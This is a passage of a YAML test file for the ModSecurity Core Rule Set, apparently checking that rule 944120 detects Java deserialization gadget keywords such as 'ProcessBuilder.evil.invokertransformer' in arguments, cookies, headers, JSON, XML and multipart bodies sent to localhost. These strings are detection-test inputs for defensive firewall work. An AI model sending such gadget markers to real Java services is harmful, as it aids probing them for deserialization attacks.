"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.invokertransformer": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-83 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.invokertransformer -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-84 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.invokertransformer -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-85 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeclonefactory" output: log_contains: "id \"944120\"" - test_title: 944120-86 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeclonefactory=test" output: log_contains: "id \"944120\"" - test_title: 944120-87 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.prototypeclonefactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-88 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: ProcessBuilder.evil.prototypeclonefactory=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-89 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.prototypeclonefactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-90 desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-91 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-92 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\"" - test_title: 944120-93 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeclonefactory" output: log_contains: "id \"944120\"" - test_title: 944120-94 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeclonefactory" output: log_contains: "id \"944120\"" - test_title: 944120-95 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeclonefactory" output: log_contains: "id \"944120\"" - test_title: 944120-96 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" output: log_contains: "id \"944120\"" - test_title: 944120-97 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" output: log_contains: "id \"944120\"" - test_title: 944120-98 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.prototypeclonefactory": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-99 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.prototypeclonefactory": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-100 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.prototypeclonefactory -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-101 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.prototypeclonefactory -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-102 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeserializationfactory" output: log_contains: "id \"944120\"" - test_title: 944120-103 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeserializationfactory=test" output: log_contains: "id \"944120\"" - test_title: 944120-104 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.prototypeserializationfactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-105 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: ProcessBuilder.evil.prototypeserializationfactory=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-106 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.prototypeserializationfactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-107 desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-108 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-109 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\"" - test_title: 944120-110 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeserializationfactory" output: log_contains: "id \"944120\"" - test_title: 944120-111 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeserializationfactory" output: log_contains: "id \"944120\"" - test_title: 944120-112 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeserializationfactory" output: log_contains: "id \"944120\"" - test_title: 944120-113 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" output: log_contains: "id \"944120\"" - test_title: 944120-114 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" output: log_contains: "id \"944120\"" - test_title: 944120-115 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.prototypeserializationfactory": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-116 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.prototypeserializationfactory": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-117 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.prototypeserializationfactory -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-118 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.prototypeserializationfactory -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-119 desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.whileclosure" output: log_contains: "id \"944120\"" - test_title: 944120-120 desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.whileclosure=test" output: log_contains: "id \"944120\"" - test_title: 944120-121 desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.whileclosure method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-122 desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: ProcessBuilder.evil.whileclosure=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-123 desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.whileclosure method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-124 desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-125 desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-126 desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 